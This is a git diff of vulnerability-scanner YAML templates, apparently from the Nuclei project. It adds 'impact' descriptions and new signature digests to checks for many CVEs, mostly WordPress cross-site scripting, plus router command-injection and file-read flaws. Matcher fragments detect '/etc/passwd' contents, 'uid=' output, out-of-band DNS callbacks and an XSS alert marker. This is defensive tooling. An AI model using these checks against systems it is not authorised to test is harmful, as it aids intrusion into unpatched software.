     Apply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 490a004630440220290cbcf329f6fb2f909608d4f0702d7a024b4673d9f0128cb2fcec9167bc921c022035aeb52e701fb2939a48bfe2e8226712f973cec49bc1efeff08c4863d1241e46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202717b5880fda7fc722cac7e169a08034fd895e095fa74b4f4de1f43ef91ddbc302201e5ea94d2f68990783cce176d05f6b7cf0999edbd5da53a1113e7be9b63e6a7a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml
index 63a3e50485..2c26d97401 100644
--- a/http/cves/2021/CVE-2021-46422.yaml
+++ b/http/cves/2021/CVE-2021-46422.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
   remediation: |
     Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
         part: interactsh_protocol
         words:
           - "dns"
-# digest: 4a0a0047304502200b628b54e3eca0596361ed906716f0e280784ed2fea0303b8ff20b04c07bbce2022100d79fda467372a2d4e8fe9214f10a20f9c62c12312ca015bf3f0937f74b128d29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022069c7d6c0340a62265d6fbd956955d1869969c9959a3b1d65a2328d99eef76a4702202c8aecb66c7ca868436210f59d65f65f516a75dec189386ca953f4b476503db4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml
index df35eb60d7..a70cb01db2 100644
--- a/http/cves/2021/CVE-2021-46424.yaml
+++ b/http/cves/2021/CVE-2021-46424.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.
+  impact: |
+    Successful exploitation could lead to loss of critical data or system instability.
   remediation: |
     Apply the latest patch or update provided by the vendor to fix the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: dsl
         dsl:
           - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"
-# digest: 4a0a00473045022047118c8a685d6e397fd38cbadb87da5b353cc4723147f84d3c40e01a2bcf0284022100d61455eacfd10de786b166a82e9fc1c167c0c19746dfb4b3ec59d192a8275671:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009d215a55aad59d4e2f975e4e06f89817ec9068b12332fdfbbe57dcc8b943e1770220249403ef73ee05ae117471b081e809e2ce2d1e4c3b82e7e4f63c8efa4a815f56:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml
index 76ea46d6c4..c3fefa7f23 100644
--- a/http/cves/2021/CVE-2021-46704.yaml
+++ b/http/cves/2021/CVE-2021-46704.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
   remediation: |
     Upgrade to a patched version of GenieACS or apply the necessary security patches to mitigate the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
         regex:
           - uid=(\d+)\((\w+)\)
         part: body
-# digest: 4a0a0047304502210099696776a897de9c249bd091cdc653b750f23ab9f1c6490948641d5bd1befa5f02205f313de13e15ffbd919c0cc7b2e6944f74a3d269fea0b72a030d5f33049944cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205b7b62949139c0e70ce5c08117179fe5a8fdf8b1e8322f63cffbc64911020a42022100fa395a23b911c19723f319490e715417f0129e67ea06014053e7203f7278d53a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml
index 818b64ecf5..9b7da91a37 100644
--- a/http/cves/2022/CVE-2022-0140.yaml
+++ b/http/cves/2022/CVE-2022-0140.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Visual Form Builder plugin (3.0.8) or apply the vendor-supplied patch to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009ea40dc416edc95c7b69ed1b520a9a2af22a2c9ddf0f281da4ab7b92274be6cb022069702cc92f0f18cb7a2e9c793885c4194dc21db004726a3f7f6e11a9bb4ffbd0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022002e2e3807cdcb2d48287a809ce3dfbb50f976272fa425dd20a017946bd78d903022100f7034de487d994c1666f79ff6df4ecda9342266d6aa300d20c53289116f0ebce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml
index 317d698cc6..a163b95d95 100644
--- a/http/cves/2022/CVE-2022-0147.yaml
+++ b/http/cves/2022/CVE-2022-0147.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the WordPress Cookie Information/Free GDPR Consent Solution plugin (2.0.8 or higher) to mitigate this vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009ac1f73e76b781ee1d6be6663bc625abc2c5376cc4a05d5cb64f73a0024d1e6702203e811d2f98cb62fa770483e92026968bd7f8febcc727676c3f261fe9f4c588e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100846b0edfeb7204c75fbae528bc40aa5b262839720ad81e922c99a9dc2bce153e02207aeb341545de0259338b06d3146bce691928c0c5cc28e8b7cbf68970b1194a70:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml
index 000670e8ab..d243bf4c73 100644
--- a/http/cves/2022/CVE-2022-0148.yaml
+++ b/http/cves/2022/CVE-2022-0148.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDK
   severity: medium
   description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008bcbf15c239ca5d751a07924c688f7bc6d062972c03dbe39d813c1166b91383f02200f350118feb48883d8962096d08662533dac17bb028fb316cd68d6469094d126:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009f071cd0f7b6f94a9aeb55ecc8dda07ae020cd69c91f3a72a5e0d0d7e4b1e309022100ed7c400c72da5c869ed1bc0606657d02ac4330d255a52f259c96abe9a5f3a57a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml
index ea5367ae4d..b0ab05e2d3 100644
--- a/http/cves/2022/CVE-2022-0149.yaml
+++ b/http/cves/2022/CVE-2022-0149.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WooCommerce Stored Exporter WordPress Plugin (2.7.1) or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022065ce77b8eaf89583295306ad0baf4d2131ee6ec868df2d81de9d68975e0ba83b02203c187f955fdc397f977cc5d27f4d1d0a7853511f6cffc9012f7f54db857896fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d9428f68c9e8914ee449309bf14af1a3aef8f8556c40ccab3b8242a6b4bd923e02207e65ff54774bbee0766bf3a806ebc2425592f0ec24ddf44251f78a8fbddfe935:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml
index 9a83ced9cc..7966869e6f 100644
--- a/http/cves/2022/CVE-2022-0150.yaml
+++ b/http/cves/2022/CVE-2022-0150.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or defacement of the affected WordPress website.
   remediation: |
     Update to WordPress Accessibility Helper version 0.6.0.7 or later to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203bf44b0e324e2b997bae4889bec2aa919e55e05fb5e3cc239c7aa86fd1bc12b50221008fe87420e45ba33ae59c804b4e365d89fbcfc92e7678e92abf26eeb1cb3d6ce7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d2be18f42411fd80d29b86ef93f31b11a1816ca270f0eddf2d5d7b01ba81d9890220279c48d52085804417d85062ba3ff22ce2beb66780c47a78193512c277b907f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml
index 8d7258ae26..b3eda5ba0b 100644
--- a/http/cves/2022/CVE-2022-0165.yaml
+++ b/http/cves/2022/CVE-2022-0165.yaml
@@ -5,6 +5,8 @@ info:
   author: akincibor
   severity: medium
   description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users).
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.
   remediation: |
     Update to the latest version of KingComposer (>=2.9.7) to fix the open redirect vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a0047304502204c1b93dcea8e0a2ffd977bf948b19f2402e13d2d945bf08f914a3ed2d1c1c381022100bffa4d4142c4cd6f3cd657f325a7c905564ff0a860ca5083911a2d15342446ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022007c42c63bf3f5850d940ccb7c30345eb285d977fc51258e6fc2bbbc0eae723cf022100cbc97aff7599f5f6390bb6032b0ea24e8c08003cbdae6cad22b384cff77785f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml
index 0664e956b1..0065f55318 100644
--- a/http/cves/2022/CVE-2022-0169.yaml
+++ b/http/cves/2022/CVE-2022-0169.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: This is resolved in release 1.6.0.
   reference:
     - https://wpscan.com/vulnerability/0b4d870f-eab8-4544-91f8-9c5f0538709c
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100fa14a563d273670629642d10db833be5d76f37a1f911d841b3251bfed8176f56022100da6f245ead37db119eeac026b82dbe83d6a1b028c830f22d647786c0f3d8fc75:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022032edd40a940b5cddd7984834fc298e6e8c5f3889f08cd27c44203e1fdf9f42b60220155c47fd53286f0a356367947c82e39cf0d227bd9fa5005c9bd43290765f3ee7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml
index cbb4a39e80..bd2e59137e 100644
--- a/http/cves/2022/CVE-2022-0189.yaml
+++ b/http/cves/2022/CVE-2022-0189.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDK
   severity: medium
   description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.
+  impact: |
+    An attacker with authenticated access can inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update WordPress RSS Aggregator plugin to version 4.20 or later to mitigate the vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c3292ee4bc9965b6b378b920016ed34564e4b72d5a787d953f10f2362f7f118a022100b55a0abc3e09725634dc808179effe9796b14d8ff8d30398a39445b1aabd2a71:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e401698ce6d79f9de0a30e0d220ef9cb28ce8f929b201dfa317bc50ff495ee7d022100d004f1e413d436bbf291409732325c12632aa1dcb81a59d014748aaf5e388753:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml
index f6b14ab196..6bd6d91628 100644
--- a/http/cves/2022/CVE-2022-0201.yaml
+++ b/http/cves/2022/CVE-2022-0201.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
         part: header
         words:
           - text/html
-# digest: 4a0a00473045022100d9f79fc3c9225dfa46f9a3862b7a3aa2bedfac1a625c7003bbb0fe383e6d061002203101afabbf7fdcc4619c445690cdf5ea0f1db16870c49a760b785248567ebea8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bcfee300895b86e8f11074dbeb93454377bc5fff70e6e9a1f80f30d07929519c02205d2d016fc3114efd16a1f77fa178f46fab290cc24fe01e2d3b105a58e593532d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml
index a42a53d90b..528330ec2c 100644
--- a/http/cves/2022/CVE-2022-0206.yaml
+++ b/http/cves/2022/CVE-2022-0206.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress NewStatPress plugin before 1.3.6 is susceptible to cross-site scripting. The plugin does not properly escape the whatX parameters before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 1.3.6.
   reference:
     - https://wpscan.com/vulnerability/ce12437a-d440-4c4a-9247-95a8f39d00b9
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "onanimationstart=alert(document.domain)")'
           - 'contains(body_2, "newstatpress_page")'
         condition: and
-# digest: 4a0a00473045022100a43836de3b4fef57877de4ec119a68800dfa93eea1038f774fa018a055f3855b022012fc7696d9842d856ed929a504c3374c55458c2cf63ef2f579c8ccde02d12713:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022050ce9ef16cd564fe4f5704f3ce035ade4cc68a8f2c22c9e407ea8aa41f469f4c02207eeb63746be0dcc1fcf21009c31ccb7648ef783f0684a7a91c699b1734a0bf4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml
index 5f77c64ac2..4adbefebf5 100644
--- a/http/cves/2022/CVE-2022-0208.yaml
+++ b/http/cves/2022/CVE-2022-0208.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200d08894b7ca79df1154f2db7667b031af16eab677da02c023588995dfd52d88d02210092ef4f82cc44e58d1daf1e7ff9e25edf8c8740cca7216ab2c50303dcb8558a3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207a53afca7de2d8daa73dda0712b78dcef2d693fadd74627f22002af2312f05df022100ef7edcd04b015f4518c4e35a54073361b644264ccfb1bd0a5825902cf06d3aa0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml
index b0f43fcaf2..e5262830b6 100644
--- a/http/cves/2022/CVE-2022-0212.yaml
+++ b/http/cves/2022/CVE-2022-0212.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WorsPress Spider Calendar plugin through 1.5.65 is susceptible to cross-site scripting. The plugin does not sanitize and escape the callback parameter before outputting it back in the page via the window AJAX action, available to both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of WordPress Spider Calendar plugin (>=1.5.66) or apply the vendor-supplied patch to fix the XSS vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203629135523769263a816cca172c6476da95d524369e00735143d8550226461f6022100ffc70ffaf39d26c5c47a6bb31893dc8040e79eb124e61e41c28f6359cd27f301:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b71f64149e36fb33ee8f193a9a45ed6f525f0d45acb2c6912a0826145e14fc3c022100b77b5a2fc4ce5831d20506c35fe0fa74b732d6290d67d07496fe5ec555fefc81:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml
index 038f3d17f1..028fa3ad8a 100644
--- a/http/cves/2022/CVE-2022-0218.yaml
+++ b/http/cves/2022/CVE-2022-0218.yaml
@@ -5,6 +5,8 @@ info:
   author: hexcat
   severity: medium
   description: WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.
+  impact: |
+    An attacker can exploit this vulnerability to inject malicious scripts into the subject field of an email template, potentially leading to unauthorized access, data theft, or further compromise of the affected system.
   remediation: |
     Update to version 3.1 or later of the HTML Email Template Designer plugin to fix the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204a61c0dacb8569543e184609c9218d3ca6aaa360db38eca203b02bf54f5f702202207b2ec8e54e121a3405554083acc74135eb6d22cb280b150883dc77fc9bd8ed95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210089bfae754da02a2c88bd7bc41a553aee6d229b5801bcbdac602972e4d3d1c5c202210097ccc1954e7532ec0ed6f6262fa1fea7f187f52652c0c1c4c97f6edb2c43d46f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml
index 83d6e77146..4a20579f8d 100644
--- a/http/cves/2022/CVE-2022-0220.yaml
+++ b/http/cves/2022/CVE-2022-0220.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users.
   reference:
     - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
@@ -55,4 +57,4 @@ http:
           - 'nonce":"([0-9a-z]+)'
         internal: true
         part: body
-# digest: 4b0a00483046022100e59bbe47bb8c047927cfefda5d667c5273090d014b77a95295c83d2fa36710f2022100acc82fc25861a35422cedf87658744b041742aaba481295c06fd5097829e2cdf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202aa5f0f7437804364b67edd4b0169b01d4497944f55a42ac59eb570e9195affa022046bf65948fc0dcb6d8f103a57a40b85bbf7ca23f54c6f67350686bf8a40d9d46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml
index f480d886f9..a1aad89cbb 100644
--- a/http/cves/2022/CVE-2022-0234.yaml
+++ b/http/cves/2022/CVE-2022-0234.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress WOOCS plugin before 1.3.7.5 is susceptible to cross-site scripting. The plugin does not sanitize and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action, available to both unauthenticated and authenticated users, before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update the WordPress WOOCS plugin to version 1.3.7.5 or later to mitigate the XSS vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502202e4d9960881ec3f3734821319a4cf4756e1e6bdd608af743d72d177207f7aefe02210083d49c5726db9e4aaffec77bddf335c6a0f6bb783bab63cab696f2584ec33c89:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207154e313bf26accead1efe1e3f387dbb967c777a3370128a4528bf081849434a022023d9722eb723e0b39f7dbad7d874357f6bdd0bade6d98c6ffb393d960b86d732:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml
index c6ac696ccb..3923274547 100644
--- a/http/cves/2022/CVE-2022-0271.yaml
+++ b/http/cves/2022/CVE-2022-0271.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade LearnPress to version 4.1.6 or later to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200f4ddc077a0fc231e9c714c6580c4f8f6ee1a8491bf39d2f81d125660c5307c7022100e768c0176bddc5bc138c98db2e8d42796a693d5590488e26e891794bd732a804:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fe0f1f1d4debbd26b9d10442395e08d68155e7083cba40e35c2cb10b50d9b50a0221009a2e3704171c5eb7975aa25554f73b59350aa7fd978975855e533db83a61a4c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml
index 10268afe82..1fda2556c5 100644
--- a/http/cves/2022/CVE-2022-0281.yaml
+++ b/http/cves/2022/CVE-2022-0281.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
+  impact: |
+    Successful exploitation of this vulnerability can lead to the exposure of sensitive data, such as user credentials or database information.
   remediation: |
     Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281).
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100945ceaeb981e5cd35d9e04715dbc6d0a35211514e203bdb70909daf3c076970802202215ccf0d3278d24c4be5f3c0e85101c7b80d632c6b75572a6273fd5562a11bf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205eb848a2373405e611adc80692a877328a44de111548c6095cee617cb82d1393022100bca30d0b5d22a9bd4d35ea5f5397993864fbb3b2d27e4a3e15e097e1d5b33eec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml
index 8faf70753d..46fb756868 100644
--- a/http/cves/2022/CVE-2022-0288.yaml
+++ b/http/cves/2022/CVE-2022-0288.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.
+  impact: |
+    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing attackers to execute malicious scripts in the context of the victim's browser.
   remediation: Fixed in version 2.7.12
   reference:
     - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008a3b2f9308e5205fa128c96268878297e93ce87a6305cce6503968a3c15890e4022100e7d67401672af695fefe86968c94ab64afa3c34dd34e60e1971b0572fdad46b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c8ae9e7047a419b10160579167375435c31e4ad4b6b2660fa25b07b41c56fbe0022015dbc2a6348d0040d1dafe3c2d9125a6f72d1c19d67f740c17f5d24224314de2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml
index 01322df9d5..833adb9f4c 100644
--- a/http/cves/2022/CVE-2022-0346.yaml
+++ b/http/cves/2022/CVE-2022-0346.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
+  impact: |
+    Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code on the affected system or inject malicious scripts into web pages viewed by users.
   remediation: |
     Update the WordPress XML Sitemap Generator for Google plugin to version 2.0.4 or later to mitigate the XSS and RCE vulnerabilities.
   reference:
@@ -47,4 +49,4 @@ http:
         part: body_2
         words:
           - "2ef3baa95802a4b646f2fc29075efe34"
